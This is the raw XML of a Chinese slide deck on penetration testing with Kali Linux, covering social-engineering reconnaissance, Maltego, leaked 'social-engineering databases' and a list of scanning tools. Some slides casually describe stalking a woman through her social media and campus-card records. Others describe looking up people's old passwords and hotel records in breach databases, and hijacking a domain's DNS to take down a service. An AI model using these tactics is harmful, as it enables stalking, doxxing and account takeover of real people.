              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2600">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>渗透测试的目的是什么？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>为了证明网络防御按照预期计划正常运行而提供的一种机制。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777505" y="546100"/>
            <a:ext cx="5449789" cy="901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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>渗透测试与Kali Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition spd="slow" advClick="1" p14:dur="1200">
        <p:circl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6" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="409111"/>
            <a:ext cx="1993900" cy="76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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>社交网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="1779356"/>
            <a:ext cx="11875642" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>社交网站往往是我们公开信息最多的地方，比如我们常用的QQ、QQ空间、微信朋友圈、微博等。能获取到的信息可能有姓名、年龄、生日、星座、爱好、照片、人际交往关系、甚至邮箱、手机、住址、身份证等等隐私、敏感信息。还有一些招聘求职网站也往往是信息泄露最严重的地方。对这些信息加以利用，总能得到一些惊喜。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393698" y="4546599"/>
            <a:ext cx="11423802" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>比如看上一个妹子，看她空间很朋友圈，基本上都能知道她的生活规律就能摸的很清楚，她长什么样，喜欢什么，闺蜜有哪些、平时去哪里玩，有时候还能推算出此时此刻她正在做什么。朋友圈那种输入名字算各种的，大部分妹子都会输入自己的名字生日等。。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555949" y="7618642"/>
            <a:ext cx="773430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既然有看上的妹子，那就花半天时间了解了解妹子。。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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81" name="image29.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279407" y="791056"/>
            <a:ext cx="10080743" cy="2026651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="image30.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527736" y="4912926"/>
            <a:ext cx="9377828" cy="1858147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Shape 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559299" y="3497017"/>
            <a:ext cx="33147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大学、旅游。。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5245099" y="7450383"/>
            <a:ext cx="19431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说说。。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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86" name="image31.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612899" y="1412521"/>
            <a:ext cx="5736286" cy="1961891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="558799"/>
            <a:ext cx="328930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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>辅之一些必要社工手段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7531098" y="2025166"/>
            <a:ext cx="10287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饭卡</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="289" name="image32.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646848" y="3819772"/>
            <a:ext cx="5874260" cy="2584676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693073" y="4261209"/>
            <a:ext cx="2939953" cy="170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3000">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>消费记录-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>平时基本都去五餐和三餐吃饭</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Shape 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8570339" y="1313966"/>
            <a:ext cx="982219" cy="2159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000"/>
            </a:pPr>
            <a:r>
              <a:t>照片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>学号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>班级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="292" name="image33.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639084" y="7215447"/>
            <a:ext cx="7089060" cy="1871226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448799" y="7992533"/>
            <a:ext cx="19431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学习成绩</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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95" name="image34.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990850" y="2176228"/>
            <a:ext cx="6282727" cy="4380325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444498" y="546099"/>
            <a:ext cx="46863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最后一不小心就得到：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="image35.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2146594" y="7450080"/>
            <a:ext cx="8427238" cy="1748339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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9" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="482599"/>
            <a:ext cx="3924300"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>推荐一本书《欺骗的艺术》</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774698" y="1003300"/>
            <a:ext cx="11251955" cy="1473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500"/>
            </a:pPr>
            <a:r>
              <a:t>在渗透实战中，我们可以通过社会工程学的手段获取管理员的信息，比如QQ号、邮箱、常用密码等等。比如可以想办法登录某网站域名注册的平台，直接修改域名解析，可能能达到瘫痪整个网络服务的效果</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="301" name="image36.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727450" y="2908300"/>
            <a:ext cx="5005062" cy="6006075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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3" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453110" y="755649"/>
            <a:ext cx="1811579"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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Maltego</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436834" y="1924961"/>
            <a:ext cx="10988132" cy="193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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>社工神器:Maltego是用来对来自互联网的信息进行收集、组织、可视化的工具。 它可以收集某个人的在线数据信息 –包括电子邮件地址、博客、Facebook中的朋友，个人爱好、地理位置、工作描述，然后可以一种更为有用、全面的形式展现出来。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="image37.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611839" y="3892282"/>
            <a:ext cx="8780931" cy="5265490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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7" name="Shape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870450" y="459911"/>
            <a:ext cx="3263900"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>第三方未公开数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765396" y="1473200"/>
            <a:ext cx="11474007" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“社工库”是运用社会工程学进行攻击的时候积累的各方面数据的结构化数据库。这个数据库里有大量信息，甚至可以找到每个人的各种行为记录，比如酒店开房记录、个人身份证、姓名和电话号码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851533" y="4089399"/>
            <a:ext cx="346583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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>例如查询某QQ号老密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="310" name="image38.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="607709" y="4989309"/>
            <a:ext cx="11474007" cy="4016446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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12" name="image39.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1505832"/>
            <a:ext cx="13004800" cy="8469136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730885" y="609599"/>
            <a:ext cx="251333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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>某QQ号的群关系</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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15" name="image40.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080111" y="1637607"/>
            <a:ext cx="7497751" cy="6107721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933450" y="850899"/>
            <a:ext cx="4241800"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>某社工库网站可查询以下数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111250" y="7973235"/>
            <a:ext cx="8228330"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通过这些数据库可能可以查到QQ密码、邮箱密码等等信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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9" name="Shape 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933205" y="761999"/>
            <a:ext cx="2247901" cy="85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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>漏洞扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Shape 320"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046633" y="4648200"/>
            <a:ext cx="3825878" cy="5191623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>网络流量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Hping3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>whatweb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>DirBuster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497012" y="1645574"/>
            <a:ext cx="10436822" cy="152214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l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
